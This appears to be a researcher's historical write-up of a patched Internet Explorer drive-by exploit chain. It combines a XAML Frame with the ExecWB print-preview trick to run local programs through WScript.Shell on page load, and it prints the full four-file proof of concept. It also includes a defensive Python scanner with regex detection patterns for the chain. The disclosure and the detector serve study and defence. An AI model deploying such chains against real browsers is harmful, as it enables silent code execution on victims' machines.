This one surprised me. By combining two techniques, loading HTML inside a XAML <Frame> element and then using the ExecWB IDM_PRINTPREVIEW trick to open a privileged modal, it became possible to execute arbitrary code automatically, with no user interaction beyond visiting the page. The entry point, index.html, was just a thin wrapper that redirected to the XAML file; it existed only to avoid browser sniffing on the .xaml extension.
<!-- index.html: redirects straight to the XAML -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> New Document </TITLE>
</HEAD>
<BODY>
<script language="JavaScript">
location.replace("index.xaml");
</script>
</BODY>
</HTML>
<!-- index.xaml: XAML page that frames xamled.html -->
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
WindowTitle="XAML_Test_Debug">
<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
<LineBreak />
<Frame Width="800" Height="470" Source="xamled.html" />
</TextBlock>
</Page>
<!-- xamled.html: uses ExecWB to open the privileged print preview modal -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ExecWB_IDM_PRINTPREVIEW_Several_Vulnerabilities</title></head>
<body>
<iframe id="iframeID" width="100" height="100"></iframe>
<script language="JavaScript">
var IDM_PRINTPREVIEW = 7;
function openPrintPreview()
{
// IDM_PRINTPREVIEW needs a FULL URL, so first take our base href and then concatenate it with "runcalc.html", the name of the page to load in the modal.
var myBaseHref = location.href.substring(0, (location.href.lastIndexOf("/") + 1));
var urlTricksPage = myBaseHref + "runcalc.html";
// Now open the PRINTPREVIEW modal dialog with runcalc.html inside.
document.all.iframeID.ExecWB(IDM_PRINTPREVIEW, 0, urlTricksPage);
}
openPrintPreview();
</script>
</body>
</html>
<!-- runcalc.html: loaded inside the privileged modal, runs calc.exe and closes -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ExecWB_IDM_PRINTPREVIEW_TricksPage</title>
<script language="JavaScript">
function executeArbitraryFile()
{
try
{
// Only succeeds because the print preview modal is privileged; from the Internet zone this ActiveXObject call is blocked.
var oShell = new ActiveXObject("WScript.Shell");
oShell.Run("file:///c:/windows/system32/calc.exe", 1, true);
}
catch(e){}
}
function executeArbitraryFileWithArguments()
{
try
{
var oShell = new ActiveXObject("WScript.Shell");
oShell.Run("file:///c:/windows/system32/cmd.exe /k dir", 1, true);
}
catch(e){}
}
executeArbitraryFile();
// Close the modal right after launching, so it only flickers.
setTimeout("window.close()",100);
// This one works also.
// executeArbitraryFileWithArguments()
</script>
</head>
<body>
</body>
</html>
The chain is: XAML Frame elevates the trust of the HTML it contains → ExecWB IDM_PRINTPREVIEW opens a privileged modal loading our runcalc.html → inside that modal, WScript.Shell.Run executes any local binary with no prompts. Everything happens automatically on page load. The modal briefly flickers and closes itself. Vista’s Protected Mode did add a warning dialog for the shell execution, but on Windows XP the whole chain ran silently.
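As an added defensive example (not part of the original post), the Python scanner below looks for the indicators this chain leaves in served content: a XAML <Frame> whose Source is an HTML file, an ExecWB call with IDM_PRINTPREVIEW (command id 7), WScript.Shell instantiated via ActiveXObject, its Run() method, and the self-closing window. It is the kind of rule set a web proxy or archive scan could run over a page tree. The sample documents, their file names and the example.invalid URL are constructed for the demo, and the verdict thresholds are my own choice, not anything from the original write-up.

```python
import re

# Indicators taken directly from the chain described above, as (name, regex) pairs.
INDICATORS = [
    # XAML <Frame> pointing at an HTML document (the trust-elevation step)
    ("xaml_frame_html",
     re.compile(r'<Frame\b[^>]*\bSource\s*=\s*"[^"]*\.html?"', re.I)),
    # ExecWB with the print preview command, by name or by its numeric id 7
    ("execwb_printpreview",
     re.compile(r'\.ExecWB\s*\(\s*(?:IDM_PRINTPREVIEW|7)\s*,', re.I)),
    # WScript.Shell instantiated from script
    ("wscript_shell",
     re.compile(r'new\s+ActiveXObject\s*\(\s*["\']WScript\.Shell["\']\s*\)', re.I)),
    # .Run("...") on some object
    ("shell_run",
     re.compile(r'\.Run\s*\(\s*["\']', re.I)),
    # window closing itself shortly after load
    ("self_close",
     re.compile(r'setTimeout\s*\(\s*["\']window\.close', re.I)),
]


def scan_document(text):
    """Return the sorted list of indicator names present in one HTML/XAML document."""
    return sorted(name for name, rx in INDICATORS if rx.search(text))


def classify(docs):
    """docs maps file name -> content for one served page tree.

    Returns (verdict, hits). 'chain' means the tree shows both the privileged
    modal (ExecWB print preview) and the shell execution primitives; 'suspicious'
    means one of the two core pieces appears on its own; otherwise 'clean'.
    """
    hits = {name: scan_document(body) for name, body in docs.items()}
    found = set().union(*hits.values())
    if {"execwb_printpreview", "wscript_shell", "shell_run"} <= found:
        return "chain", hits
    if found & {"execwb_printpreview", "wscript_shell"}:
        return "suspicious", hits
    return "clean", hits


# Constructed sample: an ordinary page that frames a report and offers a print button.
SAMPLE_BENIGN = """<html><body>
<iframe id="content" src="report.html"></iframe>
<script>function printIt(){ window.print(); }</script>
</body></html>"""

# Constructed sample: a minimal three-file tree with the same shape as the chain above.
SAMPLE_TREE = {
    "index.xaml": '<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation">\n'
                  '<Frame Width="800" Height="470" Source="xamled.html" />\n</Page>',
    "xamled.html": '<iframe id="f"></iframe><script>var IDM_PRINTPREVIEW = 7;\n'
                   'document.all.f.ExecWB(IDM_PRINTPREVIEW, 0, "http://example.invalid/run.html");</script>',
    "run.html": '<script>var s = new ActiveXObject("WScript.Shell");\n'
                's.Run("file:///c:/windows/system32/calc.exe", 1, true);\n'
                'setTimeout("window.close()", 100);</script>',
}

if __name__ == "__main__":
    verdict, hits = classify(SAMPLE_TREE)
    print(verdict)                       # chain
    for name, indicators in hits.items():
        print(f"  {name}: {indicators}")
    print(classify({"index.html": SAMPLE_BENIGN})[0])   # clean
```

The regexes are deliberately loose on whitespace and quoting because the original pages use `document.all`, mixed quote styles and `language="JavaScript"` script tags; tightening them to one style would miss trivially reformatted copies. Run it over a directory by reading each file into the `docs` mapping.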
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.